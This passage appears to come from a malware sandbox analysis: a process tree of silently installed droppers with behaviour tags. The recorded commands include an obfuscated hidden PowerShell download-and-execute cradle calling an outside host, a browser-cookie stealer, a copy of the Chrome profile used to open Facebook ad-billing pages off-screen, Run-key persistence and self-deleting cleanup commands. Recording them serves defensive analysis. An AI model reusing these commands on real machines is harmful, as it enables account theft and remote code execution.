- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\2B6J8XNKPC\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\2B6J8XNKPC\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Maps connected drives based on registry
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\2B6J8XNKPC\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\2B6J8XNKPC\multitimer.exe" 1 3.1618235763.60745173b2e85 1016⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\2B6J8XNKPC\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\2B6J8XNKPC\multitimer.exe" 2 3.1618235763.60745173b2e857⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
-
C:\Users\Admin\AppData\Local\Temp\1nqmthalbym\rfxrlayb54s.exe"C:\Users\Admin\AppData\Local\Temp\1nqmthalbym\rfxrlayb54s.exe" /VERYSILENT8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-P6ANE.tmp\rfxrlayb54s.tmp"C:\Users\Admin\AppData\Local\Temp\is-P6ANE.tmp\rfxrlayb54s.tmp" /SL5="$70238,140785,56832,C:\Users\Admin\AppData\Local\Temp\1nqmthalbym\rfxrlayb54s.exe" /VERYSILENT9⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-L98EL.tmp\apipostback.exe"C:\Users\Admin\AppData\Local\Temp\is-L98EL.tmp\apipostback.exe" adan adan10⤵
-
C:\Windows\SysWOW64\cmd.execmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\2LACnyyhO.dll"11⤵
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Users\Admin\AppData\Local\Temp\2LACnyyhO.dll"12⤵
-
C:\Windows\system32\regsvr32.exe/s "C:\Users\Admin\AppData\Local\Temp\2LACnyyhO.dll"13⤵
-
C:\Windows\SysWOW64\cmd.execmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\2LACnyyhO.dllZmfPSdcaH.dll"11⤵
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Users\Admin\AppData\Local\Temp\2LACnyyhO.dllZmfPSdcaH.dll"12⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"12⤵
-
C:\Users\Admin\AppData\Local\Temp\mnhjppr44gp\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\mnhjppr44gp\Setup3310.exe" /Verysilent /subid=5778⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-946JE.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-946JE.tmp\Setup3310.tmp" /SL5="$402BC,138429,56832,C:\Users\Admin\AppData\Local\Temp\mnhjppr44gp\Setup3310.exe" /Verysilent /subid=5779⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-R9L88.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-R9L88.tmp\Setup.exe" /Verysilent10⤵
-
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\hjjgaa.exe"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\hjjgaa.exe"11⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
-
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\jg7_7wjg.exe"11⤵
-
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe"11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im RunWW.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe" & del C:\ProgramData\*.dll & exit12⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im RunWW.exe /f13⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 613⤵
- Delays execution with timeout.exe
-
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\guihuali-game.exe"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\guihuali-game.exe"11⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"12⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install13⤵
-
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\BarSetpFile.exe"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\BarSetpFile.exe"11⤵
-
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Adsbrowser.exe"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Adsbrowser.exe"11⤵
-
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\sskiper.exe"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\sskiper.exe"11⤵
-
C:\Users\Admin\AppData\Local\Temp\1233269446.exeC:\Users\Admin\AppData\Local\Temp\1233269446.exe12⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe13⤵
-
C:\Users\Admin\AppData\Local\Temp\1254353850.exeC:\Users\Admin\AppData\Local\Temp\1254353850.exe12⤵
-
C:\Users\Admin\AppData\Local\Temp\1254353850.exe"{path}"13⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\sskiper.exe & exit12⤵
-
C:\Windows\SysWOW64\PING.EXEping 013⤵
- Runs ping.exe
-
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\JoSetp.exe"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\JoSetp.exe"11⤵
-
C:\ProgramData\984424.exe"C:\ProgramData\984424.exe"12⤵
-
C:\ProgramData\200013.exe"C:\ProgramData\200013.exe"12⤵
-
C:\ProgramData\Windows Host\Windows Host.exe"C:\ProgramData\Windows Host\Windows Host.exe"13⤵
-
C:\ProgramData\3868550.exe"C:\ProgramData\3868550.exe"12⤵
-
C:\ProgramData\3868550.exe"{path}"13⤵
-
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe"11⤵
-
C:\Users\Admin\AppData\Local\Temp\is-MJTPB.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-MJTPB.tmp\lylal220.tmp" /SL5="$B0062,298214,214528,C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe"12⤵
-
C:\Users\Admin\AppData\Local\Temp\is-HLH0I.tmp\ysAGEL.exe"C:\Users\Admin\AppData\Local\Temp\is-HLH0I.tmp\ysAGEL.exe" /S /UID=lylal22013⤵
-
C:\Program Files\Google\YRPRDJWOUD\irecord.exe"C:\Program Files\Google\YRPRDJWOUD\irecord.exe" /VERYSILENT14⤵
-
C:\Users\Admin\AppData\Local\Temp\is-IH335.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-IH335.tmp\irecord.tmp" /SL5="$30464,5922518,66560,C:\Program Files\Google\YRPRDJWOUD\irecord.exe" /VERYSILENT15⤵
-
C:\Program Files (x86)\i-record\i-record.exe"C:\Program Files (x86)\i-record\i-record.exe" -silent -desktopShortcut -programMenu16⤵
-
C:\Users\Admin\AppData\Local\Temp\1a-ee264-f91-50aa3-f03bb310410dd\Kevuqavupu.exe"C:\Users\Admin\AppData\Local\Temp\1a-ee264-f91-50aa3-f03bb310410dd\Kevuqavupu.exe"14⤵
-
C:\Users\Admin\AppData\Local\Temp\02-cfa7c-50d-91e9a-81f7ddf1e3509\Jezhoshocalu.exe"C:\Users\Admin\AppData\Local\Temp\02-cfa7c-50d-91e9a-81f7ddf1e3509\Jezhoshocalu.exe"14⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q3e0kz5x.hll\gaooo.exe & exit15⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0bjgh2lf.jku\jgjg_note8876.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\0bjgh2lf.jku\jgjg_note8876.exeC:\Users\Admin\AppData\Local\Temp\0bjgh2lf.jku\jgjg_note8876.exe16⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zc2gkcwy.iad\google-game.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\zc2gkcwy.iad\google-game.exeC:\Users\Admin\AppData\Local\Temp\zc2gkcwy.iad\google-game.exe16⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\patch.dll",patch17⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dmgre32r.3c2\askinstall31.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\dmgre32r.3c2\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\dmgre32r.3c2\askinstall31.exe16⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe17⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe18⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y17⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/17⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ff85cc44f50,0x7ff85cc44f60,0x7ff85cc44f7018⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1820,12806590918170095054,6030346335007779182,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1892 /prefetch:818⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1820,12806590918170095054,6030346335007779182,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1880 /prefetch:818⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1820,12806590918170095054,6030346335007779182,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1832 /prefetch:218⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1820,12806590918170095054,6030346335007779182,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2816 /prefetch:118⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1820,12806590918170095054,6030346335007779182,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2808 /prefetch:118⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1820,12806590918170095054,6030346335007779182,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:118⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1820,12806590918170095054,6030346335007779182,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:118⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1820,12806590918170095054,6030346335007779182,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=2 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3768 /prefetch:118⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1820,12806590918170095054,6030346335007779182,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4004 /prefetch:118⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\z2eln2e2.dpb\toolspab1.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\z2eln2e2.dpb\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\z2eln2e2.dpb\toolspab1.exe16⤵
-
C:\Users\Admin\AppData\Local\Temp\z2eln2e2.dpb\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\z2eln2e2.dpb\toolspab1.exe17⤵
-
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe"11⤵
-
C:\Users\Admin\AppData\Local\Temp\is-UKVRB.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-UKVRB.tmp\LabPicV3.tmp" /SL5="$402D4,136934,53248,C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe"12⤵
-
C:\Users\Admin\AppData\Local\Temp\is-H4SOA.tmp\alpATCHInO.exe"C:\Users\Admin\AppData\Local\Temp\is-H4SOA.tmp\alpATCHInO.exe" /S /UID=lab21413⤵
-
C:\Program Files\7-Zip\CFXBRFZKBZ\prolab.exe"C:\Program Files\7-Zip\CFXBRFZKBZ\prolab.exe" /VERYSILENT14⤵
-
C:\Users\Admin\AppData\Local\Temp\is-EVAHR.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-EVAHR.tmp\prolab.tmp" /SL5="$10534,575243,216576,C:\Program Files\7-Zip\CFXBRFZKBZ\prolab.exe" /VERYSILENT15⤵
-
C:\Users\Admin\AppData\Local\Temp\18-11502-994-fadb3-9370686ecb51a\Wyxepuvashae.exe"C:\Users\Admin\AppData\Local\Temp\18-11502-994-fadb3-9370686ecb51a\Wyxepuvashae.exe"14⤵
-
C:\Users\Admin\AppData\Local\Temp\4d-8dd34-856-30fa9-22927c89bde76\Jegerevuju.exe"C:\Users\Admin\AppData\Local\Temp\4d-8dd34-856-30fa9-22927c89bde76\Jegerevuju.exe"14⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l515v3ic.riy\gaooo.exe & exit15⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jzduef4c.ycs\jgjg_note8876.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\jzduef4c.ycs\jgjg_note8876.exeC:\Users\Admin\AppData\Local\Temp\jzduef4c.ycs\jgjg_note8876.exe16⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ttuwvuzk.jjg\google-game.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\ttuwvuzk.jjg\google-game.exeC:\Users\Admin\AppData\Local\Temp\ttuwvuzk.jjg\google-game.exe16⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\patch.dll",patch17⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kay4xugn.ab0\askinstall31.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\kay4xugn.ab0\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\kay4xugn.ab0\askinstall31.exe16⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gizn3xxy.0go\toolspab1.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\gizn3xxy.0go\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\gizn3xxy.0go\toolspab1.exe16⤵
-
C:\Users\Admin\AppData\Local\Temp\gizn3xxy.0go\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\gizn3xxy.0go\toolspab1.exe17⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\itzadyys.t3g\setup_10.2_mix.exe & exit15⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5hn30qs3.rjn\a1207b55.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\5hn30qs3.rjn\a1207b55.exeC:\Users\Admin\AppData\Local\Temp\5hn30qs3.rjn\a1207b55.exe16⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2itcge1b.xqc\app.exe /8-2222 & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\2itcge1b.xqc\app.exeC:\Users\Admin\AppData\Local\Temp\2itcge1b.xqc\app.exe /8-222216⤵
-
C:\Users\Admin\AppData\Local\Temp\2itcge1b.xqc\app.exe"C:\Users\Admin\AppData\Local\Temp\2itcge1b.xqc\app.exe" /8-222217⤵
-
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Three.exe"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Three.exe"11⤵
-
C:\Users\Admin\AppData\Local\Temp\8L8PR9I2IK\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\8L8PR9I2IK\multitimer.exe" 0 306065bb10421b26.04333812 0 10312⤵
-
C:\Users\Admin\AppData\Local\Temp\8L8PR9I2IK\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\8L8PR9I2IK\multitimer.exe" 1 3.1618235797.60745195c1976 10313⤵
-
C:\Users\Admin\AppData\Local\Temp\8L8PR9I2IK\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\8L8PR9I2IK\multitimer.exe" 2 3.1618235797.60745195c197614⤵
-
C:\Users\Admin\AppData\Local\Temp\5pulgkyok1e\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\5pulgkyok1e\Setup3310.exe" /Verysilent /subid=57715⤵
-
C:\Users\Admin\AppData\Local\Temp\is-OC66P.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-OC66P.tmp\Setup3310.tmp" /SL5="$10694,138429,56832,C:\Users\Admin\AppData\Local\Temp\5pulgkyok1e\Setup3310.exe" /Verysilent /subid=57716⤵
-
C:\Users\Admin\AppData\Local\Temp\is-9N9RH.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-9N9RH.tmp\Setup.exe" /Verysilent17⤵
-
C:\Users\Admin\AppData\Local\Temp\lydb1d3mgn2\app.exe"C:\Users\Admin\AppData\Local\Temp\lydb1d3mgn2\app.exe" /8-2315⤵
-
C:\Users\Admin\AppData\Local\Temp\lydb1d3mgn2\app.exe"C:\Users\Admin\AppData\Local\Temp\lydb1d3mgn2\app.exe" /8-2316⤵
-
C:\Users\Admin\AppData\Local\Temp\kdkccffuspm\vpn.exe"C:\Users\Admin\AppData\Local\Temp\kdkccffuspm\vpn.exe" /silent /subid=48215⤵
-
C:\Users\Admin\AppData\Local\Temp\is-47QG0.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-47QG0.tmp\vpn.tmp" /SL5="$203E0,15170975,270336,C:\Users\Admin\AppData\Local\Temp\kdkccffuspm\vpn.exe" /silent /subid=48216⤵
-
C:\Users\Admin\AppData\Local\Temp\1MTLPMRR5D\setups.exe"C:\Users\Admin\AppData\Local\Temp\1MTLPMRR5D\setups.exe" ll12⤵
-
C:\Users\Admin\AppData\Local\Temp\is-7H0EN.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-7H0EN.tmp\setups.tmp" /SL5="$50348,726852,244736,C:\Users\Admin\AppData\Local\Temp\1MTLPMRR5D\setups.exe" ll13⤵
-
C:\Users\Admin\AppData\Local\Temp\0masgnmxhli\vpn.exe"C:\Users\Admin\AppData\Local\Temp\0masgnmxhli\vpn.exe" /silent /subid=4828⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-2CNG4.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-2CNG4.tmp\vpn.tmp" /SL5="$7029A,15170975,270336,C:\Users\Admin\AppData\Local\Temp\0masgnmxhli\vpn.exe" /silent /subid=4829⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090111⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "10⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090111⤵
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall10⤵
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install10⤵
-
C:\Users\Admin\AppData\Local\Temp\ccq1fwmgzkd\KiffApp1.exe"C:\Users\Admin\AppData\Local\Temp\ccq1fwmgzkd\KiffApp1.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\3k3543bfrsi\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\3k3543bfrsi\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-PKIU2.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-PKIU2.tmp\IBInstaller_97039.tmp" /SL5="$7023A,10078909,721408,C:\Users\Admin\AppData\Local\Temp\3k3543bfrsi\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://leatherclothesone.xyz/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=9703910⤵
-
C:\Users\Admin\AppData\Local\Temp\is-B3ED1.tmp\{app}\vdi_compiler.exe"C:\Users\Admin\AppData\Local\Temp\is-B3ED1.tmp\{app}\vdi_compiler"10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-B3ED1.tmp\{app}\vdi_compiler.exe"11⤵
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 412⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\j0qaalngzkm\saiyr5emcvp.exe"C:\Users\Admin\AppData\Local\Temp\j0qaalngzkm\saiyr5emcvp.exe"8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\j0qaalngzkm\saiyr5emcvp.exe"9⤵
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 300010⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\5y5jedzrwaf\app.exe"C:\Users\Admin\AppData\Local\Temp\5y5jedzrwaf\app.exe" /8-238⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\5y5jedzrwaf\app.exe"C:\Users\Admin\AppData\Local\Temp\5y5jedzrwaf\app.exe" /8-239⤵
-
C:\Users\Admin\AppData\Local\Temp\e3vdygkctni\sq4gbpvam0w.exe"C:\Users\Admin\AppData\Local\Temp\e3vdygkctni\sq4gbpvam0w.exe" /quiet SILENT=1 AF=7568⤵
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\e3vdygkctni\sq4gbpvam0w.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\e3vdygkctni\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617976617 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"9⤵
-
C:\Users\Admin\AppData\Local\Temp\aumlrs2k2pj\setup_10.2_us3.exe"C:\Users\Admin\AppData\Local\Temp\aumlrs2k2pj\setup_10.2_us3.exe" /silent8⤵
-
